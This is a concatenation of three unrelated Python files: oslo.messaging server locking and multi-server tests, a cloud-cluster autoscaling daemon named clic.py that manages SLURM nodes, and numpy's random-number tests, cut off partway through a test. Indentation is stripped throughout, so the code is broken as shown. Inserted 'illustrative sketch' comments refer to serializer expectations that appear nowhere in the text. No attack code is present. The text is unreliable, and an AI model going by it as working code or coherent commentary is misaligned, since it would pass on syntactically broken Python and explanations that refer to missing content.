def ping(self, ctxt, arg):
self.pings.append(arg)
def alive(self, ctxt):
return 'alive'
if self.multi_endpoints:
endpoint1, endpoint2 = TestEndpoint(), TestEndpoint()
else:
endpoint1 = endpoint2 = TestEndpoint()
thread1 = self._setup_server(transport1, endpoint1,
topic=self.topic1, server=self.server1)
thread2 = self._setup_server(transport2, endpoint2,
topic=self.topic2, server=self.server2)
client1 = self._setup_client(transport1, topic=self.topic1)
client2 = self._setup_client(transport2, topic=self.topic2)
client1 = client1.prepare(server=self.server1)
client2 = client2.prepare(server=self.server2)
if self.fanout1:
client1.call({}, 'alive')
client1 = client1.prepare(fanout=True)
if self.fanout2:
client2.call({}, 'alive')
client2 = client2.prepare(fanout=True)
(client1.call if self.call1 else client1.cast)({}, 'ping', arg='1')
(client2.call if self.call2 else client2.cast)({}, 'ping', arg='2')
self.assertTrue(thread1.isAlive())
self._stop_server(client1.prepare(fanout=None),
thread1, topic=self.topic1)
self.assertTrue(thread2.isAlive())
self._stop_server(client2.prepare(fanout=None),
thread2, topic=self.topic2)
def check(pings, expect):
self.assertEqual(len(expect), len(pings))
for a in expect:
self.assertIn(a, pings)
if self.expect_either:
check(endpoint1.pings + endpoint2.pings, self.expect_either)
else:
check(endpoint1.pings, self.expect1)
check(endpoint2.pings, self.expect2)
TestMultipleServers.generate_scenarios()
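# --- Illustrative sketch (not part of the original tests) ---
# generate_scenarios() above builds the test matrix with
# testscenarios.multiply_scenarios, which takes the cartesian product of
# several (name, params) lists, combining the names and merging the param
# dicts.  A tiny, made-up example of the shape it produces:
def _demo_multiply_scenarios():
    import testscenarios
    exchanges = [('same_exchange', dict(exchange='x')), ('diff_exchange', dict(exchange='y'))]
    methods = [('call', dict(call=True)), ('cast', dict(call=False))]
    # Four scenarios, e.g. ('same_exchange,call', {'exchange': 'x', 'call': True})
    return testscenarios.multiply_scenarios(exchanges, methods)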
class TestServerLocking(test_utils.BaseTestCase):
def setUp(self):
super(TestServerLocking, self).setUp(conf=cfg.ConfigOpts())
def _logmethod(name):
def method(self):
with self._lock:
self._calls.append(name)
return method
executors = []
class FakeExecutor(object):
def __init__(self, *args, **kwargs):
self._lock = threading.Lock()
self._calls = []
self.listener = mock.MagicMock()
executors.append(self)
start = _logmethod('start')
stop = _logmethod('stop')
wait = _logmethod('wait')
execute = _logmethod('execute')
self.executors = executors
self.server = oslo_messaging.MessageHandlingServer(mock.Mock(),
mock.Mock())
self.server._executor_cls = FakeExecutor
def test_start_stop_wait(self):
# Test a simple execution of start, stop, wait in order
thread = eventlet.spawn(self.server.start)
self.server.stop()
self.server.wait()
self.assertEqual(len(self.executors), 1)
executor = self.executors[0]
self.assertEqual(executor._calls,
['start', 'execute', 'stop', 'wait'])
self.assertTrue(executor.listener.cleanup.called)
def test_reversed_order(self):
# Test that if we call wait, stop, start, these will be correctly
# reordered
wait = eventlet.spawn(self.server.wait)
# This is non-deterministic, but there's not a great deal we can do
# about that
eventlet.sleep(0)
stop = eventlet.spawn(self.server.stop)
eventlet.sleep(0)
start = eventlet.spawn(self.server.start)
self.server.wait()
self.assertEqual(len(self.executors), 1)
executor = self.executors[0]
self.assertEqual(executor._calls,
['start', 'execute', 'stop', 'wait'])
def test_wait_for_running_task(self):
# Test that if 2 threads call a method simultaneously, both will wait,
# but only 1 will call the underlying executor method.
start_event = threading.Event()
finish_event = threading.Event()
running_event = threading.Event()
done_event = threading.Event()
runner = [None]
class SteppingFakeExecutor(self.server._executor_cls):
def start(self):
# Tell the test which thread won the race
runner[0] = eventlet.getcurrent()
running_event.set()
start_event.wait()
super(SteppingFakeExecutor, self).start()
done_event.set()
finish_event.wait()
self.server._executor_cls = SteppingFakeExecutor
start1 = eventlet.spawn(self.server.start)
start2 = eventlet.spawn(self.server.start)
# Wait until one of the threads starts running
running_event.wait()
runner = runner[0]
waiter = start2 if runner == start1 else start1
waiter_finished = threading.Event()
waiter.link(lambda _: waiter_finished.set())
# At this point, runner is running start(), and waiter is waiting for it
# to complete. runner has not yet logged anything.
self.assertEqual(1, len(self.executors))
executor = self.executors[0]
self.assertEqual(executor._calls, [])
self.assertFalse(waiter_finished.is_set())
# Let the runner log the call
start_event.set()
done_event.wait()
# We haven't signalled completion yet, so execute shouldn't have run
self.assertEqual(executor._calls, ['start'])
self.assertFalse(waiter_finished.is_set())
# Let the runner complete
finish_event.set()
waiter.wait()
runner.wait()
# Check that both threads have finished, start was only called once,
# and execute ran
self.assertTrue(waiter_finished.is_set())
self.assertEqual(executor._calls, ['start', 'execute'])
def test_start_stop_wait_stop_wait(self):
# Test that we behave correctly when calling stop/wait more than once.
# Subsequent calls should be noops.
self.server.start()
self.server.stop()
self.server.wait()
self.server.stop()
self.server.wait()
self.assertEqual(len(self.executors), 1)
executor = self.executors[0]
self.assertEqual(executor._calls,
['start', 'execute', 'stop', 'wait'])
self.assertTrue(executor.listener.cleanup.called)
def test_state_wrapping(self):
# Test that we behave correctly if a thread waits, and the server state
# has wrapped by the time it is next scheduled
# Ensure that if 2 threads wait for the completion of 'start', the
# first will wait until complete_event is signalled, but the second
# will continue
complete_event = threading.Event()
complete_waiting_callback = threading.Event()
start_state = self.server._states['start']
old_wait_for_completion = start_state.wait_for_completion
waited = [False]
def new_wait_for_completion(*args, **kwargs):
if not waited[0]:
waited[0] = True
complete_waiting_callback.set()
complete_event.wait()
old_wait_for_completion(*args, **kwargs)
start_state.wait_for_completion = new_wait_for_completion
# thread1 will wait for start to complete until we signal it
thread1 = eventlet.spawn(self.server.stop)
thread1_finished = threading.Event()
thread1.link(lambda _: thread1_finished.set())
self.server.start()
complete_waiting_callback.wait()
# The server should have started, but stop should not have been called
self.assertEqual(1, len(self.executors))
self.assertEqual(self.executors[0]._calls, ['start', 'execute'])
self.assertFalse(thread1_finished.is_set())
self.server.stop()
self.server.wait()
# We should have gone through all the states, and thread1 should still
# be waiting
self.assertEqual(1, len(self.executors))
self.assertEqual(self.executors[0]._calls, ['start', 'execute',
'stop', 'wait'])
self.assertFalse(thread1_finished.is_set())
# Start again
self.server.start()
# We should now record 2 executors
self.assertEqual(2, len(self.executors))
self.assertEqual(self.executors[0]._calls, ['start', 'execute',
'stop', 'wait'])
self.assertEqual(self.executors[1]._calls, ['start', 'execute'])
self.assertFalse(thread1_finished.is_set())
# Allow thread1 to complete
complete_event.set()
thread1_finished.wait()
# thread1 should now have finished, and stop should not have been
# called again on either the first or second executor
self.assertEqual(2, len(self.executors))
self.assertEqual(self.executors[0]._calls, ['start', 'execute',
'stop', 'wait'])
self.assertEqual(self.executors[1]._calls, ['start', 'execute'])
self.assertTrue(thread1_finished.is_set())
@mock.patch.object(server_module, 'DEFAULT_LOG_AFTER', 1)
@mock.patch.object(server_module, 'LOG')
def test_logging(self, mock_log):
# Test that we generate a log message if we wait longer than
# DEFAULT_LOG_AFTER
log_event = threading.Event()
mock_log.warn.side_effect = lambda _: log_event.set()
# Call stop without calling start. We should log a wait after 1 second
thread = eventlet.spawn(self.server.stop)
log_event.wait()
# Redundant given that we already waited, but it's nice to assert
self.assertTrue(mock_log.warn.called)
thread.kill()
@mock.patch.object(server_module, 'LOG')
def test_logging_explicit_wait(self, mock_log):
# Test that we generate a log message if we wait longer than
# the number of seconds passed to log_after
log_event = threading.Event()
mock_log.warn.side_effect = lambda _: log_event.set()
# Call stop without calling start. We should log a wait after 1 second
thread = eventlet.spawn(self.server.stop, log_after=1)
log_event.wait()
# Redundant given that we already waited, but it's nice to assert
self.assertTrue(mock_log.warn.called)
thread.kill()
@mock.patch.object(server_module, 'LOG')
def test_logging_with_timeout(self, mock_log):
# Test that we log a message after log_after seconds if we've also
# specified an absolute timeout
log_event = threading.Event()
mock_log.warn.side_effect = lambda _: log_event.set()
# Call stop without calling start. We should log a wait after 1 second
thread = eventlet.spawn(self.server.stop, log_after=1, timeout=2)
log_event.wait()
# Redundant given that we already waited, but it's nice to assert
self.assertTrue(mock_log.warn.called)
thread.kill()
def test_timeout_wait(self):
# Test that we will eventually timeout when passing the timeout option
# if a preceding condition is not satisfied.
self.assertRaises(server_module.TaskTimeout,
self.server.stop, timeout=1)
def test_timeout_running(self):
# Test that we will eventually timeout if we're waiting for another
# thread to complete this task
# Start the server, which will also instantiate an executor
self.server.start()
stop_called = threading.Event()
# Patch the executor's stop method to be very slow
def slow_stop():
stop_called.set()
eventlet.sleep(10)
self.executors[0].stop = slow_stop
# Call stop in a new thread
thread = eventlet.spawn(self.server.stop)
# Wait until the thread is in the slow stop method
stop_called.wait()
# Call stop again in the main thread with a timeout
self.assertRaises(server_module.TaskTimeout,
self.server.stop, timeout=1)
thread.kill()
@mock.patch.object(server_module, 'LOG')
def test_log_after_zero(self, mock_log):
# Test that we do not log a message after DEFAULT_LOG_AFTER if the
# caller gave log_after=0
# Call stop without calling start.
self.assertRaises(server_module.TaskTimeout,
self.server.stop, log_after=0, timeout=2)
# We timed out. Ensure we didn't log anything.
self.assertFalse(mock_log.warn.called)
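# --- Illustrative sketch (not part of the original tests) ---
# The 'dsfoo' / 'dsdsfoo' expectations above fall out of TestSerializer
# adding an 's' prefix on serialize and a 'd' prefix on deserialize.  A cast
# crosses the wire once (client serializes, server deserializes); a call
# additionally serializes and deserializes the return value on the way back.
# The helpers below simply mirror that prefixing to show the bookkeeping.
def _demo_serializer_roundtrip(arg='foo'):
    def serialize(entity):
        return 's' + entity
    def deserialize(entity):
        return 'd' + entity
    at_server = deserialize(serialize(arg))        # 'dsfoo'   -> what a cast records
    at_client = deserialize(serialize(at_server))  # 'dsdsfoo' -> what a call returns
    return at_server, at_client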
|
clic.py
|
#!/usr/bin/env python3
import subprocess
import os
import re
import time
import rpyc
import configparser
import fileinput
from threading import Thread
from clic import initnode
from clic import nodesup
from clic import synchosts
from clic import pssh
from clic import nodes
config = configparser.ConfigParser()
config.read('/etc/clic/clic.conf')
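# Illustrative sketch of /etc/clic/clic.conf (values are assumptions for
# illustration only; the keys match the ones read below in this module):
#   [Daemon]
#   minRuntime = 300
#   namescheme = cluster
#   logfile = /var/log/clic.log
#   cloudHeadnode = yes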
# Constants
settings = config['Daemon']
minRuntime = settings.getint('minRuntime')
namescheme = settings['namescheme']
import logging as loggingmod
loggingmod.basicConfig(filename=settings['logfile'], format='%(levelname)s: %(message)s', level=loggingmod.CRITICAL)
logging = loggingmod.getLogger('clic')
logging.setLevel(loggingmod.DEBUG)
isCloud = settings.getboolean('cloudHeadnode')
# Cloud settings
from clic import cloud as api
cloud = api.getCloud()
# Queue settings
isHeadnode = os.popen('hostname -s').read().strip() == namescheme or not isCloud
from clic import queue as q
queue = q.getQueue(isHeadnode, nodes.partitions)
class Job:
def __init__(self, num):
self.num = num
self.time = time.time()
def timeWaiting(self):
return time.time() - self.time
jobs = {partition : [] for partition in nodes.partitions}
def getNodesInState(state):
return {node for node in nodes.nodes if node.state == state}
def getDeletableNodes(partition):
deletable = queue.idle()
return [node for node in deletable if node.partition == partition and node.state == 'R' and node.timeInState() >= minRuntime]
def create(numToCreate, partition):
existingDisks = cloud.getDisks()
while numToCreate > 0:
# Get a valid node
while True:
node = nodes.getFreeNode(partition)
if node is None:
return
elif node.name in existingDisks:
node.setState('D')
logging.warning('Disk for {0} exists, but shouldn\'t! Deleting...'.format(node.name))
cloud.deleteDisk(node.name)
else:
break
node.setState('C')
node.errors = 0
queue.nodeChangedState(node)
logging.info('Creating {}'.format(node.name))
cloud.create(node)
numToCreate -= 1
def deleteNode(node):
node.setState('D')
logging.info('Deleting {}'.format(node.name))
queue.nodeChangedState(node)
cloud.delete(node)
#subprocess.Popen('while true; do if [ -n "`sinfo -h -N -o "%N %t" | grep "{0} " | awk \'{{print $2}}\' | grep drain`" ]; then echo Y | gcloud compute instances delete {0}; break; fi; sleep 10; done'.format(node.name), shell=True)
def mainLoop():
while True:
if not isCloud:
synchosts.addAll()
# Start with some bookkeeping
queueRunning = queue.running()
cloudRunning = nodesup.responds()
cloudAll = nodesup.all(False)
# Nodes that were creating and now are running:
cameUp = []
for node in cloudRunning:
if node.state == 'C':
node.setState('R')
initnode.init(node.name, node.partition.cpus, node.partition.disk, node.partition.mem)
cameUp.append(node)
logging.info('Node {} came up'.format(node.name))
if len(cameUp) > 0:
queue.configChanged()
for node in cameUp:
queue.nodeChangedState(node)
continue
# Nodes that were deleting and now are gone:
nodesWentDown = False
for node in getNodesInState('D') - cloudAll:
nodesWentDown = True
node.setState('')
queue.nodeChangedState(node)
logging.info('Node {} went down'.format(node.name))
if nodesWentDown:
# There's a chance they'll come up later with different IPs.
queue.configChanged()
continue
# Error conditions:
# We think they're up, but the cloud doesn't:
for node in getNodesInState('R') - cloudAll:
logging.warning('Node {} deleted outside of clic!'.format(node.name))
deleteNode(node)
# We think they're running, but slurm doesn't:
for node in getNodesInState('R') - queueRunning:
if node.timeInState() > 30:
logging.error('Node {} is unresponsive!'.format(node.name))
queue.restart(False, node=node)
node.errors += 1
if node.errors < 5:
# Spam a bunch of stuff to try to bring it back online
initnode.init(node.name, node.partition.cpus, node.partition.disk, node.partition.mem)
queue.restart(True, node=node)
time.sleep(5)
for node in getNodesInState('R'):
queue.restart(False, node=node)
else:
# Something is very wrong. Kill it.
node.setState('D')
logging.error('Node {} is unresponsive. Deleting...'.format(node.name))
queue.nodeChangedState(node)
cloud.delete(node)
# Nodes are running but aren't registered:
for node in cloudRunning - getNodesInState('R') - getNodesInState('D'):
logging.warning('Encountered unregistered node {}!'.format(node.name))
node.setState('R')
if node not in queueRunning:
queue.nodeChangedState(node)
# Nodes that are taking way too long to boot:
for node in getNodesInState('C'):
if node.timeInState() > 200:
logging.error('Node {} hung on boot!'.format(node.name))
# Bookkeeping for jobs. Modify the existing structure rather than replacing it, because Job objects track how long they have been waiting.
# jobs = {partition : [job, ...], ...}
# qJobs = [[jobNum, partition], ...]
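# Illustrative example of these structures (job numbers and partition names are hypothetical):
#   jobs  = {'compute': [Job('101'), Job('102')], 'highmem': []}
#   qJobs = [['101', 'compute'], ['103', 'highmem']]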
qJobs = queue.queuedJobs()
# Delete dequeued jobs
for partition in jobs:
for job in jobs[partition]:
if job.num not in [qJob[0] for qJob in qJobs if qJob[1] == partition]:
jobs[partition].remove(job)
# Add new jobs
# Sometimes, immediately after slurmctld restarts, running jobs are listed as queued. Only track jobs whose number is greater than that of any job already tracked.
sampleNum = 0
for partition in jobs:
for job in jobs[partition]:
if int(job.num) > sampleNum:
sampleNum = int(job.num)
for qJob in qJobs:
if qJob[1] in jobs and qJob[0] not in [job.num for job in jobs[qJob[1]]] and int(qJob[0]) > sampleNum:
jobs[qJob[1]].append(Job(qJob[0]))
# Create and delete nodes
for partition in jobs:
deletable = getDeletableNodes(partition)
creating = {node for node in getNodesInState('C') if node.partition == partition}
running = {node for node in getNodesInState('R') if node.partition == partition}
if len(creating) + len(running) == 0 and len(jobs[partition]) > 0:
create(int((len(jobs[partition]) + 1) / 2), partition)
else:
# SLURM may not have had the chance to utilize some "running" nodes
unutilized = 0
for node in running:
if node.timeInState() < 60:
unutilized += 1
jobsWaitingTooLong = [job for job in jobs[partition] if job.timeWaiting() > 30]
create(int((len(jobsWaitingTooLong) + 1) / 2 - len(creating) - len(deletable) - unutilized), partition)
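# Worked example (hypothetical numbers): with 5 jobs waiting too long, 1 node
# creating, 0 deletable and 1 unutilized, int((5 + 1) / 2 - 1 - 0 - 1) == 1,
# so one additional node is requested.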
# Delete nodes
if len(deletable) > 0 and len(jobs[partition]) == 0:
for node in deletable[0:int((len(deletable) + 1) / 2)]:
deleteNode(node)
class exportNodes(rpyc.Service):
def on_connect(self):
pass
def on_disconnect(self):
pass
def exposed_getNodes(self):
return nodes.nodes
def startServer():
if __name__ == "__main__":
from rpyc.utils.server import ThreadedServer
t = ThreadedServer(exportNodes, hostname='localhost', port=18861, protocol_config={'allow_public_attrs':True})
t.start()
def main():
import argparse
parser = argparse.ArgumentParser(description='Start the clic daemon')
from clic import version
parser.add_argument('-v', '--version', action='version', version=version.__version__)
parser.parse_args()
Thread(target=startServer).start()
if isHeadnode:
# This is the head node
logging.info('Starting clic as a head node')
# Sort out ssh keys
from clic import copyid
copyid.refresh(True)
copyid.copyAll(True)
copyid.send()
queue.restart(True)
mainLoop()
else:
# This is a compute node
logging.info('Starting clic as a compute node')
|
test_random.py
|
from __future__ import division, absolute_import, print_function
import warnings
import numpy as np
from numpy.testing import (
assert_, assert_raises, assert_equal, assert_warns,
assert_no_warnings, assert_array_equal, assert_array_almost_equal,
suppress_warnings
)
from numpy import random
import sys
class TestSeed(object):
def test_scalar(self):
s = np.random.RandomState(0)
assert_equal(s.randint(1000), 684)
s = np.random.RandomState(4294967295)
assert_equal(s.randint(1000), 419)
def test_array(self):
s = np.random.RandomState(range(10))
assert_equal(s.randint(1000), 468)
s = np.random.RandomState(np.arange(10))
assert_equal(s.randint(1000), 468)
s = np.random.RandomState([0])
assert_equal(s.randint(1000), 973)
s = np.random.RandomState([4294967295])
assert_equal(s.randint(1000), 265)
def test_invalid_scalar(self):
# seed must be an unsigned 32 bit integer
assert_raises(TypeError, np.random.RandomState, -0.5)
assert_raises(ValueError, np.random.RandomState, -1)
def test_invalid_array(self):
# seed must be an unsigned 32 bit integer
assert_raises(TypeError, np.random.RandomState, [-0.5])
assert_raises(ValueError, np.random.RandomState, [-1])
assert_raises(ValueError, np.random.RandomState, [4294967296])
assert_raises(ValueError, np.random.RandomState, [1, 2, 4294967296])
assert_raises(ValueError, np.random.RandomState, [1, -2, 4294967296])
def test_invalid_array_shape(self):
# gh-9832
assert_raises(ValueError, np.random.RandomState, np.array([], dtype=np.int64))
assert_raises(ValueError, np.random.RandomState, [[1, 2, 3]])
assert_raises(ValueError, np.random.RandomState, [[1, 2, 3],
[4, 5, 6]])
class TestBinomial(object):
def test_n_zero(self):
# Tests the corner case of n == 0 for the binomial distribution.
# binomial(0, p) should be zero for any p in [0, 1].
# This test addresses issue #3480.
zeros = np.zeros(2, dtype='int')
for p in [0, .5, 1]:
assert_(random.binomial(0, p) == 0)
assert_array_equal(random.binomial(zeros, p), zeros)
def test_p_is_nan(self):
# Issue #4571.
assert_raises(ValueError, random.binomial, 1, np.nan)
class TestMultinomial(object):
def test_basic(self):
random.multinomial(100, [0.2, 0.8])
def test_zero_probability(self):
random.multinomial(100, [0.2, 0.8, 0.0, 0.0, 0.0])
def test_int_negative_interval(self):
assert_(-5 <= random.randint(-5, -1) < -1)
x = random.randint(-5, -1, 5)
assert_(np.all(-5 <= x))
assert_(np.all(x < -1))
def test_size(self):
# gh-3173
p = [0.5, 0.5]
assert_equal(np.random.multinomial(1, p, np.uint32(1)).shape, (1, 2))
assert_equal(np.random.multinomial(1, p, np.uint32(1)).shape, (1, 2))
assert_equal(np.random.multinomial(1, p, np.uint32(1)).shape, (1, 2))
assert_equal(np.random.multinomial(1, p, [2, 2]).shape, (2, 2, 2))
assert_equal(np.random.multinomial(1, p, (2, 2)).shape, (2, 2, 2))
assert_equal(np.random.multinomial(1, p, np.array((2, 2))).shape,
(2, 2, 2))
assert_raises(TypeError, np.random.multinomial, 1, p,
float(1))
class TestSetState(object):
def setup(self):
self.seed = 1234567890
self.prng = random.RandomState(self.seed)
self.state = self.prng.get_state()
def test_basic(self):
old = self.prng.tomaxint(16)
self.prng.set_state(self.state)
new = self.prng.tomaxint(16)
assert_(np.all(old == new))
def test_gaussian_reset(self):
# Make sure the cached every-other-Gaussian is reset.
old = self.prng.standard_normal(size=3)
self.prng.set_state(self.state)
new = self.prng.standard_normal(size=3)
assert_(np.all(old == new))
def test_gaussian_reset_in_media_res(self):
# When the state is saved with a cached Gaussian, make sure the
# cached Gaussian is restored.
self.prng.standard_normal()
state = self.prng.get_state()
old = self.prng.standard_normal(size=3)
self.prng.set_state(state)
new = self.prng.standard_normal(size=3)
assert_(np.all(old == new))
def test_backwards_compatibility(self):
# Make sure we can accept old state tuples that do not have the
# cached Gaussian value.
old_state = self.state[:-2]
x1 = self.prng.standard_normal(size=16)
self.prng.set_state(old_state)
x2 = self.prng.standard_normal(size=16)
self.prng.set_state(self.state)
x3 = self.prng.standard_normal(size=16)
assert_(np.all(x1 == x2))
assert_(np.all(x1 == x3))
def test_negative_binomial(self):
# Ensure that the negative binomial results take floating point
# arguments without truncation.
self.prng.negative_binomial(0.5, 0.5)
class TestRandint(object):
rfunc = np.random.randint
# valid integer/boolean types
itype = [np.bool_, np.int8, np.uint8, np.int16, np.uint16,
np.int32, np.uint32, np.int64, np.uint64]
def test_unsupported_type(self):
assert_raises(TypeError, self.rfunc, 1, dtype=float)
def test_bounds_checking(self):
for dt in self.itype:
lbnd = 0 if dt is np.bool_ else np.iinfo(dt).min
ubnd = 2 if dt is np.bool_ else np.iinfo(dt).max + 1
assert_raises(ValueError, self.rfunc, lbnd - 1, ubnd, dtype=dt)
assert_raises(ValueError, self.rfunc, lbnd, ubnd + 1, dtype=dt)
assert_raises(ValueError, self.rfunc, ubnd, lbnd, dtype=dt)
assert_raises(ValueError, self.rfunc, 1, 0, dtype=dt)
def test_rng_zero_and_extremes(self):
for dt in self.itype:
lbnd = 0 if dt is np.bool_ else np.iinfo(dt).min
ubnd = 2 if dt is np.bool_ else np.iinfo(dt).max + 1
tgt = ubnd - 1
assert_equal(self.rfunc(tgt, tgt + 1, size=1000, dtype=dt), tgt)
tgt = lbnd
assert_equal(self.rfunc(tgt, tgt + 1, size=1000, dtype=dt), tgt)
tgt = (lbnd + ubnd)//2
assert_equal(self.rfunc(tgt, tgt + 1, size=1000, dtype=dt), tgt)
def test_full_range(self):
# Test for ticket #1690
for dt in self.itype:
lbnd = 0 if dt is np.bool_ else np.iinfo(dt).min
ubnd = 2 if dt is np.bool_ else np.iinfo(dt).max + 1
try:
self.rfunc(lbnd, ubnd, dtype=dt)
except Exception as e:
raise AssertionError("No error should have been raised, "
"but one was with the following "
"message:\n\n%s" % str(e))
def test_in_bounds_fuzz(self):
# Don't use fixed seed
np.random.seed()
for dt in self.itype[1:]:
for ubnd in [4, 8, 16]:
vals = self.rfunc(2, ubnd, size=2**16, dtype=dt)
assert_(vals.max() < ubnd)
assert_(vals.min() >= 2)
vals = self.rfunc(0, 2, size=2**16, dtype=np.bool_)
assert_(vals.max() < 2)
assert_(vals.min() >= 0)
def test_repeatability(self):
import hashlib
# We use a md5 hash of generated sequences of 1000 samples
# in the range [0, 6) for all but bool, where the range
# is [0, 2). Hashes are for little endian numbers.
tgt = {'bool': '7dd3170d7aa461d201a65f8bcf3944b0',
'int16': '1b7741b80964bb190c50d541dca1cac1',
'int32': '4dc9fcc2b395577ebb51793e58ed1a05',
'int64': '17db902806f448331b5a758d7d2ee672',
'int8': '27dd30c4e08a797063dffac2490b0be6',
'uint16': '1b7741b80964bb190c50d541dca1cac1',
'uint32': '4dc9fcc2b395577ebb51793e58ed1a05',
'uint64': '17db902806f448331b5a758d7d2ee672',
'uint8': '27dd30c4e08a797063dffac2490b0be6'}
for dt in self.itype[1:]:
np.random.seed(1234)
# view as little endian for hash
if sys.byteorder == 'little':
val = self.rfunc(0, 6, size=1000, dtype=dt)
else:
val = self.rfunc(0, 6, size=1000, dtype=dt).byteswap()
res = hashlib.md5(val.view(np.int8)).hexdigest()
assert_(tgt[np.dtype(dt).name] == res)
# bools do not depend on endianness
np.random.seed(1234)
val = self.rfunc(0, 2, size=1000, dtype=bool).view(np.int8)
res = hashlib.md5(val).hexdigest()
assert_(tgt[np.dtype(bool).name] == res)
def test_int64_uint64_corner_case(self):
# When stored in Numpy arrays, `lbnd` is casted
# as np.int64, and `ubnd` is casted as np.uint64.
# Checking whether `lbnd` >= `ubnd` used to be
# done solely via direct comparison, which is incorrect
# because when Numpy tries to compare both numbers,
# it casts both to np.float64 because there is
# no integer superset of np.int64 and np.uint64. However,
# `ubnd` is too large to be represented in np.float64,
# causing it to be rounded down to np.iinfo(np.int64).max,
# leading to a ValueError because `lbnd` now equals
# the new `ubnd`.
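# Illustrative sketch of that old failure mode (not part of this test's assertions):
#   np.int64(2**63 - 1) == np.uint64(2**63)   # both promoted to float64, so
#                                             # older comparisons saw them as equal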
dt = np.int64
tgt = np.iinfo(np.int64).max
lbnd = np.int64(np.iinfo(np.int64).max)
ubnd = np.uint64(np.iinfo(np.int64).max + 1)
# None of these function calls should
# generate a ValueError now.
actual = np.random.randint(lbnd, ubnd, dtype=dt)
assert_equal(actual, tgt)
def test_respect_dtype_singleton(self):
# See gh-7203
for dt in self.itype:
lbnd = 0 if dt is np.bool_ else np.iinfo(dt).min
ubnd = 2 if dt is np.bool_ else np.iinfo(dt).max + 1
sample = self.rfunc(lbnd, ubnd, dtype=dt)
assert_equal(sample.dtype, np.dtype(dt))
for dt in (bool, int, np.long):
lbnd = 0 if dt is bool else np.iinfo(dt).min
ubnd = 2 if dt is bool else np.iinfo(dt).max + 1
# gh-7284: Ensure that we get Python data types
sample = self.rfunc(lbnd, ubnd, dtype=dt)
assert_(not hasattr(sample, 'dtype'))
assert_equal(type(sample), dt)
class TestRandomDist(object):
# Make sure the random distribution returns the correct value for a
# given seed
def setup(self):
self.seed = 1234567890
def test_rand(self):
np.random.seed(self.seed)
actual = np.random.rand(3, 2)
desired = np.array([[0.61879477158567997, 0.59162362775974664],
[0.88868358904449662, 0.89165480011560816],
[0.4575674820298663, 0.7781880808593471]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_randn(self):
np.random.seed(self.seed)
actual = np.random.randn(3, 2)
desired = np.array([[1.34016345771863121, 1.73759122771936081],
[1.498988344300628, -0.2286433324536169],
[2.031033998682787, 2.17032494605655257]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_randint(self):
np.random.seed(self.seed)
actual = np.random.randint(-99, 99, size=(3, 2))
desired = np.array([[31, 3],
[-52, 41],
[-48, -66]])
assert_array_equal(actual, desired)
def test_random_integers(self):
np.random.seed(self.seed)
with suppress_warnings() as sup:
w = sup.record(DeprecationWarning)
actual = np.random.random_integers(-99, 99, size=(3, 2))
assert_(len(w) == 1)
desired = np.array([[31, 3],
[-52, 41],
[-48, -66]])
assert_array_equal(actual, desired)
def test_random_integers_max_int(self):
# Tests whether random_integers can generate the
# maximum allowed Python int that can be converted
# into a C long. Previous implementations of this
# method have thrown an OverflowError when attempting
# to generate this integer.
with suppress_warnings() as sup:
w = sup.record(DeprecationWarning)
actual = np.random.random_integers(np.iinfo('l').max,
np.iinfo('l').max)
assert_(len(w) == 1)
desired = np.iinfo('l').max
assert_equal(actual, desired)
def test_random_integers_deprecated(self):
with warnings.catch_warnings():
warnings.simplefilter("error", DeprecationWarning)
# DeprecationWarning raised with high == None
assert_raises(DeprecationWarning,
np.random.random_integers,
np.iinfo('l').max)
# DeprecationWarning raised with high != None
assert_raises(DeprecationWarning,
np.random.random_integers,
np.iinfo('l').max, np.iinfo('l').max)
def test_random_sample(self):
np.random.seed(self.seed)
actual = np.random.random_sample((3, 2))
desired = np.array([[0.61879477158567997, 0.59162362775974664],
[0.88868358904449662, 0.89165480011560816],
[0.4575674820298663, 0.7781880808593471]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_choice_uniform_replace(self):
np.random.seed(self.seed)
actual = np.random.choice(4, 4)
desired = np.array([2, 3, 2, 3])
assert_array_equal(actual, desired)
def test_choice_nonuniform_replace(self):
np.random.seed(self.seed)
actual = np.random.choice(4, 4, p=[0.4, 0.4, 0.1, 0.1])
desired = np.array([1, 1, 2, 2])
assert_array_equal(actual, desired)
def test_choice_uniform_noreplace(self):
np.random.seed(self.seed)
actual = np.random.choice(4, 3, replace=False)
desired = np.array([0, 1, 3])
assert_array_equal(actual, desired)
def test_choice_nonuniform_noreplace(self):
np.random.seed(self.seed)
actual = np.random.choice(4, 3, replace=False,
p=[0.1, 0.3, 0.5, 0.1])
desired = np.array([2, 3, 1])
assert_array_equal(actual, desired)
def test_choice_noninteger(self):
np.random.seed(self.seed)
actual = np.random.choice(['a', 'b', 'c', 'd'], 4)
desired = np.array(['c', 'd', 'c', 'd'])
assert_array_equal(actual, desired)
def test_choice_exceptions(self):
sample = np.random.choice
assert_raises(ValueError, sample, -1, 3)
assert_raises(ValueError, sample, 3., 3)
assert_raises(ValueError, sample, [[1, 2], [3, 4]], 3)
assert_raises(ValueError, sample, [], 3)
assert_raises(ValueError, sample, [1, 2, 3, 4], 3,
p=[[0.25, 0.25], [0.25, 0.25]])
assert_raises(ValueError, sample, [1, 2], 3, p=[0.4, 0.4, 0.2])
assert_raises(ValueError, sample, [1, 2], 3, p=[1.1, -0.1])
assert_raises(ValueError, sample, [1, 2], 3, p=[0.4, 0.4])
assert_raises(ValueError, sample, [1, 2, 3], 4, replace=False)
assert_raises(ValueError, sample, [1, 2, 3], 2,
replace=False, p=[1, 0, 0])
def test_choice_return_shape(self):
p = [0.1, 0.9]
# Check scalar
assert_(np.isscalar(np.random.choice(2, replace=True)))
assert_(np.isscalar(np.random.choice(2, replace=False)))
assert_(np.isscalar(np.random.choice(2, replace=True, p=p)))
assert_(np.isscalar(np.random.choice(2, replace=False, p=p)))
assert_(np.isscalar(np.random.choice([1, 2], replace=True)))
assert_(np.random.choice([None], replace=True) is None)
a = np.array([1, 2])
arr = np.empty(1, dtype=object)
arr[0] = a
assert_(np.random.choice(arr, replace=True) is a)
# Check 0-d array
s = tuple()
assert_(not np.isscalar(np.random.choice(2, s, replace=True)))
assert_(not np.isscalar(np.random.choice(2, s, replace=False)))
assert_(not np.isscalar(np.random.choice(2, s, replace=True, p=p)))
assert_(not np.isscalar(np.random.choice(2, s, replace=False, p=p)))
assert_(not np.isscalar(np.random.choice([1, 2], s, replace=True)))
assert_(np.random.choice([None], s, replace=True).ndim == 0)
a = np.array([1, 2])
arr = np.empty(1, dtype=object)
arr[0] = a
assert_(np.random.choice(arr, s, replace=True).item() is a)
# Check multi dimensional array
